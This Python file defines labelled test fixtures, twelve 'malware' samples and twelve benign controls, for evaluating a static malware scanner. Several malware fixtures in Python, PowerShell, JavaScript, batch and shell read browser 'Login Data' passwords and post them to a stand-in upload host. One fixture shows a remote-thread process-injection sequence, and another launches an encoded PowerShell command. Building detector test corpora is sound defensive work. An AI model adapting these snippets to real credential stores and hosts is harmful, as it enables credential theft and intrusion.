"""Deterministic inert fixture definitions for the static-semantic corpus.

Generation intent is evaluation-only. Renderer specifications contain only artifact-production
instructions and can be passed to the renderer without exposing class or ATT&CK labels.
"""
from __future__ import annotations

from Virus_Scan.stress.static_semantic_schema import (
    ArtifactRendererSpecification,
    CorpusFixtureDefinition,
    CorpusGenerationIntent,
    StaticFlowTruth,
    StaticReachabilityTruth,
)


def _r(kind: str, state: str, count: int = 1) -> StaticReachabilityTruth:
    return StaticReachabilityTruth(kind, state, count)


def _f(source: str, sink: str, connected: bool) -> StaticFlowTruth:
    return StaticFlowTruth(source, sink, connected)


STATIC_SEMANTIC_FIXTURES = (
    CorpusFixtureDefinition(
        generation_intent=CorpusGenerationIntent(
            generation_id='python_credential_flow',
            malware_class='malware',
            coverage_cohort='malware_artifact',
            desired_parser_status='complete',
            desired_literal_references=('Browser/Login Data', 'SELECT username_value, password_value FROM logins', 'https://example.invalid/upload'),
            desired_operation_kinds=('credential_store_discovery', 'database_open', 'database_query', 'credential_store_query', 'serialize', 'network_send', 'network_upload'),
            forbidden_operation_kinds=('process_launch', 'memory_write'),
            desired_reachability=(_r('credential_store_query', 'entrypoint_reachable', 1), _r('network_send', 'entrypoint_reachable', 1)),
            desired_flow=(_f('credential_store_query', 'network_send', True),),
            desired_technique_ids=(),
            desired_artifact_implementation_state='expected',
            generation_seed='stage2636.11020:phase37:2026-08-15:inert:python_credential_flow',
            unresolved_states=(),
        ),
        renderer_specification=ArtifactRendererSpecification(
            renderer_kind='text',
            extension='.py',
            member_extension='',
            language='python',
            platform='Windows',
            source_text="import sqlite3, json, requests\nconnection = sqlite3.connect('Browser/Login Data')\nrows = connection.execute('SELECT username_value, password_value FROM logins')\npayload = json.dumps(rows)\nrequests.post('https://example.invalid/upload', data=payload)\n",
            fixture_variant='',
        ),
    ),
    CorpusFixtureDefinition(
        generation_intent=CorpusGenerationIntent(
            generation_id='python_called_alias_flow',
            malware_class='malware',
            coverage_cohort='malware_artifact',
            desired_parser_status='complete',
            desired_literal_references=('Browser/Login Data', 'SELECT password_value FROM logins', 'https://example.invalid/upload'),
            desired_operation_kinds=('credential_store_discovery', 'database_open', 'database_query', 'credential_store_query', 'network_send', 'network_upload'),
            forbidden_operation_kinds=('process_launch',),
            desired_reachability=(_r('credential_store_query', 'entrypoint_reachable', 1), _r('network_send', 'entrypoint_reachable', 1)),
            desired_flow=(_f('credential_store_query', 'network_send', True),),
            desired_technique_ids=(),
            desired_artifact_implementation_state='expected',
            generation_seed='stage2636.11020:phase37:2026-08-15:inert:python_called_alias_flow',
            unresolved_states=(),
        ),
        renderer_specification=ArtifactRendererSpecification(
            renderer_kind='text',
            extension='.py',
            member_extension='',
            language='python',
            platform='Windows',
            source_text="import sqlite3 as db\nimport requests as transport\ndef collect_and_send():\n    connection = db.connect('Browser/Login Data')\n    rows = connection.execute('SELECT password_value FROM logins')\n    transport.post('https://example.invalid/upload', data=rows)\ncollect_and_send()\n",
            fixture_variant='',
        ),
    ),
    CorpusFixtureDefinition(
        generation_intent=CorpusGenerationIntent(
            generation_id='python_process_injection_sequence',
            malware_class='malware',
            coverage_cohort='malware_artifact',
            desired_parser_status='complete',
            desired_literal_references=('OpenProcess', 'VirtualAllocEx', 'WriteProcessMemory', 'CreateRemoteThread'),
            desired_operation_kinds=('process_open', 'memory_allocate', 'memory_write', 'thread_execute'),
            forbidden_operation_kinds=('network_send',),
            desired_reachability=(_r('process_open', 'entrypoint_reachable', 1), _r('thread_execute', 'entrypoint_reachable', 1)),
            desired_flow=(),
            desired_technique_ids=('T1055',),
            desired_artifact_implementation_state='expected',
            generation_seed='stage2636.11020:phase37:2026-08-15:inert:python_process_injection_sequence',
            unresolved_states=(),
        ),
        renderer_specification=ArtifactRendererSpecification(
            renderer_kind='text',
            extension='.py',
            member_extension='',
            language='python',
            platform='Windows',
            source_text="import ctypes\nkernel32 = ctypes.windll.kernel32\nhandle = kernel32.OpenProcess(0x0010, False, 4242)\nregion = kernel32.VirtualAllocEx(handle, 0, 64, 0x1000, 0x04)\nkernel32.WriteProcessMemory(handle, region, b'UMIGE', 5, None)\nkernel32.CreateRemoteThread(handle, None, 0, region, None, 0, None)\n",
            fixture_variant='',
        ),
    ),
    CorpusFixtureDefinition(
        generation_intent=CorpusGenerationIntent(
            generation_id='python_conditional_upload',
            malware_class='malware',
            coverage_cohort='malware_artifact',
            desired_parser_status='complete',
            desired_literal_references=('base64.b64decode', 'https://example.invalid/upload', 'unknown_flag'),
            desired_operation_kinds=('decode', 'network_send', 'network_upload'),
            forbidden_operation_kinds=('network_download',),
            desired_reachability=(_r('decode', 'entrypoint_reachable', 1), _r('network_send', 'conditionally_reachable', 1)),
            desired_flow=(),
            desired_technique_ids=(),
            desired_artifact_implementation_state='conditional',
            generation_seed='stage2636.11020:phase37:2026-08-15:inert:python_conditional_upload',
            unresolved_states=('condition_value_unresolved',),
        ),
        renderer_specification=ArtifactRendererSpecification(
            renderer_kind='text',
            extension='.py',
            member_extension='',
            language='python',
            platform='Windows',
            source_text="import base64, requests\nencoded = b'VU1JR0Ugc3ludGhldGljIGNvbmRpdGlvbmFsIHBheWxvYWQ='\npayload = base64.b64decode(encoded)\nif unknown_flag:\n    requests.post('https://example.invalid/upload', data=payload)\n",
            fixture_variant='',
        ),
    ),
    CorpusFixtureDefinition(
        generation_intent=CorpusGenerationIntent(
            generation_id='powershell_credential_flow',
            malware_class='malware',
            coverage_cohort='malware_artifact',
            desired_parser_status='complete',
            desired_literal_references=('Browser/Login Data', 'https://example.invalid/upload'),
            desired_operation_kinds=('credential_store_discovery', 'file_read', 'serialize', 'network_connect', 'network_send', 'network_upload'),
            forbidden_operation_kinds=('process_launch',),
            desired_reachability=(_r('file_read', 'entrypoint_reachable', 1), _r('network_send', 'entrypoint_reachable', 1)),
            desired_flow=(_f('file_read', 'network_send', True),),
            desired_technique_ids=(),
            desired_artifact_implementation_state='expected',
            generation_seed='stage2636.11020:phase37:2026-08-15:inert:powershell_credential_flow',
            unresolved_states=(),
        ),
        renderer_specification=ArtifactRendererSpecification(
            renderer_kind='text',
            extension='.ps1',
            member_extension='',
            language='powershell',
            platform='Windows',
            source_text="Get-Content 'Browser/Login Data' | ConvertTo-Json | Invoke-WebRequest -Uri:https://example.invalid/upload -Method:POST\n",
            fixture_variant='',
        ),
    ),
    CorpusFixtureDefinition(
        generation_intent=CorpusGenerationIntent(
            generation_id='javascript_file_upload',
            malware_class='malware',
            coverage_cohort='malware_artifact',
            desired_parser_status='complete',
            desired_literal_references=('Browser/Login Data', 'https://example.invalid/upload'),
            desired_operation_kinds=('file_read', 'credential_store_discovery', 'network_send', 'network_upload'),
            forbidden_operation_kinds=('process_launch',),
            desired_reachability=(_r('file_read', 'entrypoint_reachable', 1), _r('network_send', 'entrypoint_reachable', 1)),
            desired_flow=(_f('file_read', 'network_send', True),),
            desired_technique_ids=(),
            desired_artifact_implementation_state='expected',
            generation_seed='stage2636.11020:phase37:2026-08-15:inert:javascript_file_upload',
            unresolved_states=(),
        ),
        renderer_specification=ArtifactRendererSpecification(
            renderer_kind='text',
            extension='.js',
            member_extension='',
            language='javascript',
            platform='multi',
            source_text="const fs = require('fs');\nconst data = fs.readFileSync('Browser/Login Data');\nfetch('https://example.invalid/upload', {method:'POST', body:data});\n",
            fixture_variant='',
        ),
    ),
    CorpusFixtureDefinition(
        generation_intent=CorpusGenerationIntent(
            generation_id='batch_file_upload',
            malware_class='malware',
            coverage_cohort='malware_artifact',
            desired_parser_status='complete',
            desired_literal_references=('synthetic_secret.txt', 'https://example.invalid/upload'),
            desired_operation_kinds=('file_read', 'network_send', 'network_upload'),
            forbidden_operation_kinds=('network_download',),
            desired_reachability=(_r('file_read', 'entrypoint_reachable', 1), _r('network_send', 'entrypoint_reachable', 1)),
            desired_flow=(_f('file_read', 'network_send', True),),
            desired_technique_ids=(),
            desired_artifact_implementation_state='expected',
            generation_seed='stage2636.11020:phase37:2026-08-15:inert:batch_file_upload',
            unresolved_states=(),
        ),
        renderer_specification=ArtifactRendererSpecification(
            renderer_kind='text',
            extension='.cmd',
            member_extension='',
            language='batch',
            platform='Windows',
            source_text='@echo off\nset /p data=<synthetic_secret.txt\ncurl --data "%data%" https://example.invalid/upload\n',
            fixture_variant='',
        ),
    ),
    CorpusFixtureDefinition(
        generation_intent=CorpusGenerationIntent(
            generation_id='shell_file_upload',
            malware_class='malware',
            coverage_cohort='malware_artifact',
            desired_parser_status='complete',
            desired_literal_references=('synthetic_secret.txt', 'https://example.invalid/upload'),
            desired_operation_kinds=('file_read', 'network_send', 'network_upload'),
            forbidden_operation_kinds=('network_download',),
            desired_reachability=(_r('file_read', 'entrypoint_reachable', 1), _r('network_send', 'entrypoint_reachable', 1)),
            desired_flow=(_f('file_read', 'network_send', True),),
            desired_technique_ids=(),
            desired_artifact_implementation_state='expected',
            generation_seed='stage2636.11020:phase37:2026-08-15:inert:shell_file_upload',
            unresolved_states=(),
        ),
        renderer_specification=ArtifactRendererSpecification(
            renderer_kind='text',
            extension='.sh',
            member_extension='',
            language='shell',
            platform='Linux',
            source_text='data=$(cat synthetic_secret.txt)\ncurl --data "$data" https://example.invalid/upload\n',
            fixture_variant='',
        ),
    ),
    CorpusFixtureDefinition(
        generation_intent=CorpusGenerationIntent(
            generation_id='nested_archive_python_flow',
            malware_class='malware',
            coverage_cohort='malware_artifact',
            desired_parser_status='unavailable',
            desired_literal_references=('Browser/Login Data', 'SELECT password_value FROM logins', 'https://example.invalid/upload'),
            desired_operation_kinds=('credential_store_discovery', 'database_open', 'database_query', 'credential_store_query', 'network_send', 'network_upload'),
            forbidden_operation_kinds=('process_launch',),
            desired_reachability=(_r('credential_store_query', 'entrypoint_reachable', 1), _r('network_send', 'entrypoint_reachable', 1)),
            desired_flow=(_f('credential_store_query', 'network_send', True),),
            desired_technique_ids=(),
            desired_artifact_implementation_state='expected',
            generation_seed='stage2636.11020:phase37:2026-08-15:inert:nested_archive_python_flow',
            unresolved_states=('archive_member_ir_not_published_at_container_boundary',),
        ),
        renderer_specification=ArtifactRendererSpecification(
            renderer_kind='nested_zip',
            extension='.zip',
            member_extension='.py',
            language='python_nested_archive',
            platform='Windows',
            source_text="import sqlite3, requests\nconnection = sqlite3.connect('Browser/Login Data')\nrows = connection.execute('SELECT password_value FROM logins')\nrequests.post('https://example.invalid/upload', data=rows)\n",
            fixture_variant='',
        ),
    ),
    CorpusFixtureDefinition(
        generation_intent=CorpusGenerationIntent(
            generation_id='renpy_process_launch',
            malware_class='malware',
            coverage_cohort='malware_artifact',
            desired_parser_status='complete',
            desired_literal_references=('powershell.exe', '-EncodedCommand', 'QQBBAEEA'),
            desired_operation_kinds=('process_launch',),
            forbidden_operation_kinds=('network_send',),
            desired_reachability=(_r('process_launch', 'entrypoint_reachable', 1),),
            desired_flow=(),
            desired_technique_ids=('T1059.001',),
            desired_artifact_implementation_state='expected',
            generation_seed='stage2636.11020:phase37:2026-08-15:inert:renpy_process_launch',
            unresolved_states=(),
        ),
        renderer_specification=ArtifactRendererSpecification(
            renderer_kind='text',
            extension='.rpy',
            member_extension='',
            language='renpy',
            platform='Windows',
            source_text="label start:\n    pass\ninit python:\n    import subprocess\n    subprocess.run(['powershell.exe', '-EncodedCommand', 'QQBBAEEA'])\n",
            fixture_variant='',
        ),
    ),
    CorpusFixtureDefinition(
        generation_intent=CorpusGenerationIntent(
            generation_id='dotnet_managed_file_network_flow',
            malware_class='malware',
            coverage_cohort='malware_artifact',
            desired_parser_status='complete',
            desired_literal_references=('C:/Users/Test/Login Data', 'https://example.invalid/upload', 'kernel32.dll'),
            desired_operation_kinds=('file_read', 'network_send', 'process_launch', 'process_open'),
            forbidden_operation_kinds=('memory_write', 'native_syscall'),
            desired_reachability=(_r('file_read', 'entrypoint_reachable', 1), _r('network_send', 'entrypoint_reachable', 1), _r('process_launch', 'entrypoint_reachable', 1), _r('process_launch', 'unreachable', 1), _r('process_open', 'entrypoint_reachable', 1)),
            desired_flow=(_f('file_read', 'network_send', True),),
            desired_technique_ids=(),
            desired_artifact_implementation_state='expected',
            generation_seed='stage2636.11020:phase37:2026-08-15:inert:dotnet_managed_file_network_flow',
            unresolved_states=(),
        ),
        renderer_specification=ArtifactRendererSpecification(
            renderer_kind='managed_pe',
            extension='.exe',
            member_extension='',
            language='dotnet_il',
            platform='Windows',
            source_text='Deterministic inert PE/CLI parser fixture with reserved synthetic resources only.\n',
            fixture_variant='managed_behavior',
        ),
    ),
    CorpusFixtureDefinition(
        generation_intent=CorpusGenerationIntent(
            generation_id='native_elf_import_flow_positive',
            malware_class='malware',
            coverage_cohort='malware_artifact',
            desired_parser_status='complete',
            desired_literal_references=('phase5-native-buffer', 'resource:channel:primary'),
            desired_operation_kinds=('file_read', 'network_send', 'native_return'),
            forbidden_operation_kinds=('native_call', 'native_syscall'),
            desired_reachability=(_r('file_read', 'entrypoint_reachable', 1), _r('network_send', 'entrypoint_reachable', 1), _r('native_return', 'entrypoint_reachable', 1)),
            desired_flow=(_f('file_read', 'network_send', True),),
            desired_technique_ids=(),
            desired_artifact_implementation_state='expected',
            generation_seed='stage2636.11020:phase5:2026-08-16:inert:native_elf_import_flow_positive',
            unresolved_states=(),
        ),
        renderer_specification=ArtifactRendererSpecification(
            renderer_kind='native_elf_x86_64',
            extension='.elf',
            member_extension='',
            language='native_x86_64',
            platform='Linux',
            source_text='Deterministic inert dynamic ELF read-to-send semantic fixture; never executed.\n',
            fixture_variant='import_flow_positive',
        ),
    ),
    CorpusFixtureDefinition(
        generation_intent=CorpusGenerationIntent(
            generation_id='python_documentation_only',
            malware_class='control',
            coverage_cohort='benign_script_lookalike',
            desired_parser_status='complete',
            desired_literal_references=('Browser/Login Data', 'requests.post', 'subprocess.run'),
            desired_operation_kinds=(),
            forbidden_operation_kinds=('database_open', 'network_send', 'process_launch'),
            desired_reachability=(),
            desired_flow=(),
            desired_technique_ids=(),
            desired_artifact_implementation_state='not_expected',
            generation_seed='stage2636.11020:phase37:2026-08-15:inert:python_documentation_only',
            unresolved_states=(),
        ),
        renderer_specification=ArtifactRendererSpecification(
            renderer_kind='text',
            extension='.py',
            member_extension='',
            language='python',
            platform='multi',
            source_text='"""sqlite3.connect(\'Browser/Login Data\'); requests.post(secret)"""\n# subprocess.run([\'powershell\'])\n',
            fixture_variant='',
        ),
    ),
    CorpusFixtureDefinition(
        generation_intent=CorpusGenerationIntent(
            generation_id='python_dead_unreachable',
            malware_class='control',
            coverage_cohort='adjacent_technique_control',
            desired_parser_status='complete',
            desired_literal_references=('never.exe',),
            desired_operation_kinds=('process_launch',),
            forbidden_operation_kinds=('network_send',),
            desired_reachability=(_r('process_launch', 'unreachable', 1),),
            desired_flow=(),
            desired_technique_ids=(),
            desired_artifact_implementation_state='not_expected',
            generation_seed='stage2636.11020:phase37:2026-08-15:inert:python_dead_unreachable',
            unresolved_states=(),
        ),
        renderer_specification=ArtifactRendererSpecification(
            renderer_kind='text',
            extension='.py',
            member_extension='',
            language='python',
            platform='multi',
            source_text="import subprocess\ndef dormant():\n    return\n    subprocess.run(['never.exe'])\n",
            fixture_variant='',
        ),
    ),
    CorpusFixtureDefinition(
        generation_intent=CorpusGenerationIntent(
            generation_id='python_disconnected_flow',
            malware_class='control',
            coverage_cohort='adjacent_technique_control',
            desired_parser_status='complete',
            desired_literal_references=('Browser/Login Data', 'SELECT password_value FROM logins', 'https://example.invalid/upload'),
            desired_operation_kinds=('credential_store_discovery', 'database_open', 'database_query', 'credential_store_query', 'serialize', 'network_send', 'network_upload'),
            forbidden_operation_kinds=('process_launch',),
            desired_reachability=(_r('credential_store_query', 'entrypoint_reachable', 1), _r('network_send', 'entrypoint_reachable', 1)),
            desired_flow=(_f('credential_store_query', 'network_send', False),),
            desired_technique_ids=(),
            desired_artifact_implementation_state='not_expected',
            generation_seed='stage2636.11020:phase37:2026-08-15:inert:python_disconnected_flow',
            unresolved_states=(),
        ),
        renderer_specification=ArtifactRendererSpecification(
            renderer_kind='text',
            extension='.py',
            member_extension='',
            language='python',
            platform='Windows',
            source_text="import sqlite3, json, requests\nconnection = sqlite3.connect('Browser/Login Data')\nrows = connection.execute('SELECT password_value FROM logins')\npayload = json.dumps({'status':'ok'})\nrequests.post('https://example.invalid/upload', data=payload)\n",
            fixture_variant='',
        ),
    ),
    CorpusFixtureDefinition(
        generation_intent=CorpusGenerationIntent(
            generation_id='python_dynamic_eval',
            malware_class='control',
            coverage_cohort='unsupported_or_unavailable',
            desired_parser_status='partial',
            desired_literal_references=('eval', 'https://example.invalid'),
            desired_operation_kinds=(),
            forbidden_operation_kinds=('network_send',),
            desired_reachability=(),
            desired_flow=(),
            desired_technique_ids=(),
            desired_artifact_implementation_state='unavailable',
            generation_seed='stage2636.11020:phase37:2026-08-15:inert:python_dynamic_eval',
            unresolved_states=('dynamic_construct:eval',),
        ),
        renderer_specification=ArtifactRendererSpecification(
            renderer_kind='text',
            extension='.py',
            member_extension='',
            language='python',
            platform='multi',
            source_text='payload = "requests.post(\'https://example.invalid\', data=\'UMIGE\')"\neval(payload)\n',
            fixture_variant='',
        ),
    ),
    CorpusFixtureDefinition(
        generation_intent=CorpusGenerationIntent(
            generation_id='python_benign_admin',
            malware_class='control',
            coverage_cohort='administrative_or_dual_use',
            desired_parser_status='complete',
            desired_literal_references=('UMIGE backup check', 'https://example.invalid/health'),
            desired_operation_kinds=('process_launch', 'network_connect', 'network_download'),
            forbidden_operation_kinds=('credential_store_query', 'memory_write', 'network_upload'),
            desired_reachability=(_r('process_launch', 'entrypoint_reachable', 1), _r('network_download', 'entrypoint_reachable', 1)),
            desired_flow=(),
            desired_technique_ids=(),
            desired_artifact_implementation_state='not_expected',
            generation_seed='stage2636.11020:phase37:2026-08-15:inert:python_benign_admin',
            unresolved_states=(),
        ),
        renderer_specification=ArtifactRendererSpecification(
            renderer_kind='text',
            extension='.py',
            member_extension='',
            language='python',
            platform='multi',
            source_text="import subprocess\nfrom urllib import request\nsubprocess.run(['echo', 'UMIGE backup check'])\nrequest.urlopen('https://example.invalid/health')\n",
            fixture_variant='',
        ),
    ),
    CorpusFixtureDefinition(
        generation_intent=CorpusGenerationIntent(
            generation_id='nested_archive_javascript_documentation',
            malware_class='control',
            coverage_cohort='benign_script_lookalike',
            desired_parser_status='unavailable',
            desired_literal_references=('Browser/Login Data', 'child_process.exec', 'https://example.invalid'),
            desired_operation_kinds=(),
            forbidden_operation_kinds=('file_read', 'network_send', 'process_launch'),
            desired_reachability=(),
            desired_flow=(),
            desired_technique_ids=(),
            desired_artifact_implementation_state='not_expected',
            generation_seed='stage2636.11020:phase37:2026-08-15:inert:nested_archive_javascript_documentation',
            unresolved_states=('archive_member_ir_not_published_at_container_boundary',),
        ),
        renderer_specification=ArtifactRendererSpecification(
            renderer_kind='nested_zip',
            extension='.zip',
            member_extension='.js',
            language='javascript_nested_archive',
            platform='multi',
            source_text="// fs.readFileSync('Browser/Login Data'); fetch('https://example.invalid', {method:'POST'});\nconst documentation = `child_process.exec('cmd.exe')`;\nconsole.log(documentation);\n",
            fixture_variant='',
        ),
    ),
    CorpusFixtureDefinition(
        generation_intent=CorpusGenerationIntent(
            generation_id='typescript_dead_code',
            malware_class='control',
            coverage_cohort='adjacent_technique_control',
            desired_parser_status='complete',
            desired_literal_references=('synthetic.txt', 'never.exe'),
            desired_operation_kinds=('file_read', 'process_launch'),
            forbidden_operation_kinds=('network_send',),
            desired_reachability=(_r('file_read', 'entrypoint_reachable', 1), _r('process_launch', 'unreachable', 1)),
            desired_flow=(),
            desired_technique_ids=(),
            desired_artifact_implementation_state='not_expected',
            generation_seed='stage2636.11020:phase37:2026-08-15:inert:typescript_dead_code',
            unresolved_states=(),
        ),
        renderer_specification=ArtifactRendererSpecification(
            renderer_kind='text',
            extension='.ts',
            member_extension='',
            language='typescript',
            platform='multi',
            source_text="import { readFileSync } from 'fs';\nconst data: Buffer = readFileSync('synthetic.txt');\nif (false) { require('child_process').exec('never.exe'); }\n",
            fixture_variant='',
        ),
    ),
    CorpusFixtureDefinition(
        generation_intent=CorpusGenerationIntent(
            generation_id='powershell_documentation_only',
            malware_class='control',
            coverage_cohort='benign_script_lookalike',
            desired_parser_status='complete',
            desired_literal_references=('Browser/Login Data', 'Invoke-WebRequest', 'https://example.invalid'),
            desired_operation_kinds=(),
            forbidden_operation_kinds=('file_read', 'network_send', 'network_upload'),
            desired_reachability=(),
            desired_flow=(),
            desired_technique_ids=(),
            desired_artifact_implementation_state='not_expected',
            generation_seed='stage2636.11020:phase37:2026-08-15:inert:powershell_documentation_only',
            unresolved_states=(),
        ),
        renderer_specification=ArtifactRendererSpecification(
            renderer_kind='text',
            extension='.ps1',
            member_extension='',
            language='powershell',
            platform='Windows',
            source_text='<# Get-Content \'Browser/Login Data\' | Invoke-WebRequest -Method POST #>\n$documentation = @"\nInvoke-WebRequest -Uri https://example.invalid -Body credential\n"@\nWrite-Output $documentation\n',
            fixture_variant='',
        ),
    ),
    CorpusFixtureDefinition(
        generation_intent=CorpusGenerationIntent(
            generation_id='dotnet_managed_documentation_only',
            malware_class='control',
            coverage_cohort='benign_script_lookalike',
            desired_parser_status='complete',
            desired_literal_references=('C:/Users/Test/Login Data', 'https://example.invalid/upload', 'calc.exe'),
            desired_operation_kinds=(),
            forbidden_operation_kinds=('file_read', 'network_send', 'process_launch', 'process_open'),
            desired_reachability=(),
            desired_flow=(),
            desired_technique_ids=(),
            desired_artifact_implementation_state='not_expected',
            generation_seed='stage2636.11020:phase37:2026-08-15:inert:dotnet_managed_documentation_only',
            unresolved_states=(),
        ),
        renderer_specification=ArtifactRendererSpecification(
            renderer_kind='managed_pe',
            extension='.dll',
            member_extension='',
            language='dotnet_il',
            platform='Windows',
            source_text='Deterministic inert PE/CLI metadata-only control; referenced APIs are never called.\n',
            fixture_variant='managed_documentation_only',
        ),
    ),
    CorpusFixtureDefinition(
        generation_intent=CorpusGenerationIntent(
            generation_id='native_elf_symbols_no_calls',
            malware_class='control',
            coverage_cohort='administrative_or_dual_use',
            desired_parser_status='complete',
            desired_literal_references=('phase5-native-buffer', 'resource:channel:primary'),
            desired_operation_kinds=('native_return',),
            forbidden_operation_kinds=('file_read', 'network_send', 'native_call', 'native_syscall'),
            desired_reachability=(_r('native_return', 'entrypoint_reachable', 1),),
            desired_flow=(),
            desired_technique_ids=(),
            desired_artifact_implementation_state='not_expected',
            generation_seed='stage2636.11020:phase5:2026-08-16:inert:native_elf_symbols_no_calls',
            unresolved_states=(),
        ),
        renderer_specification=ArtifactRendererSpecification(
            renderer_kind='native_elf_x86_64',
            extension='.elf',
            member_extension='',
            language='native_x86_64',
            platform='Linux',
            source_text='Deterministic inert dynamic ELF with matching imports but no import calls.\n',
            fixture_variant='symbols_no_calls',
        ),
    ),
    CorpusFixtureDefinition(
        generation_intent=CorpusGenerationIntent(
            generation_id='malformed_python',
            malware_class='control',
            coverage_cohort='corrupt_or_truncated',
            desired_parser_status='failed',
            desired_literal_references=('requests.post',),
            desired_operation_kinds=(),
            forbidden_operation_kinds=('network_send',),
            desired_reachability=(),
            desired_flow=(),
            desired_technique_ids=(),
            desired_artifact_implementation_state='unavailable',
            generation_seed='stage2636.11020:phase37:2026-08-15:inert:malformed_python',
            unresolved_states=('parser_failed:SyntaxError',),
        ),
        renderer_specification=ArtifactRendererSpecification(
            renderer_kind='text',
            extension='.py',
            member_extension='',
            language='python',
            platform='multi',
            source_text='import requests\nrequests.post(\n',
            fixture_variant='',
        ),
    ),
    CorpusFixtureDefinition(
        generation_intent=CorpusGenerationIntent(
            generation_id='unsupported_ruby_upload',
            malware_class='control',
            coverage_cohort='unsupported_or_unavailable',
            desired_parser_status='unavailable',
            desired_literal_references=('synthetic.txt', 'https://example.invalid/upload'),
            desired_operation_kinds=(),
            forbidden_operation_kinds=('file_read', 'network_send'),
            desired_reachability=(),
            desired_flow=(),
            desired_technique_ids=(),
            desired_artifact_implementation_state='unavailable',
            generation_seed='stage2636.11020:phase37:2026-08-15:inert:unsupported_ruby_upload',
            unresolved_states=('language_frontend_unavailable',),
        ),
        renderer_specification=ArtifactRendererSpecification(
            renderer_kind='text',
            extension='.rb',
            member_extension='',
            language='ruby_unsupported',
            platform='multi',
            source_text="# UMIGE inert unsupported-language fixture\ndata = File.read('synthetic.txt')\nNet::HTTP.post(URI('https://example.invalid/upload'), data)\n",
            fixture_variant='',
        ),
    ),
)

MALWARE_STATIC_SEMANTIC_FIXTURES = tuple(
    item for item in STATIC_SEMANTIC_FIXTURES
    if item.generation_intent.malware_class == "malware"
)
CONTROL_STATIC_SEMANTIC_FIXTURES = tuple(
    item for item in STATIC_SEMANTIC_FIXTURES
    if item.generation_intent.malware_class == "control"
)

if len(STATIC_SEMANTIC_FIXTURES) != 24:
    raise RuntimeError("static_semantic_fixture_count_invalid")
if len(MALWARE_STATIC_SEMANTIC_FIXTURES) != 12 or len(CONTROL_STATIC_SEMANTIC_FIXTURES) != 12:
    raise RuntimeError("static_semantic_fixture_class_balance_invalid")
if len({item.generation_intent.generation_id for item in STATIC_SEMANTIC_FIXTURES}) != len(STATIC_SEMANTIC_FIXTURES):
    raise RuntimeError("static_semantic_fixture_identity_duplicate")

__all__ = (
    "CONTROL_STATIC_SEMANTIC_FIXTURES",
    "MALWARE_STATIC_SEMANTIC_FIXTURES",
    "STATIC_SEMANTIC_FIXTURES",
)
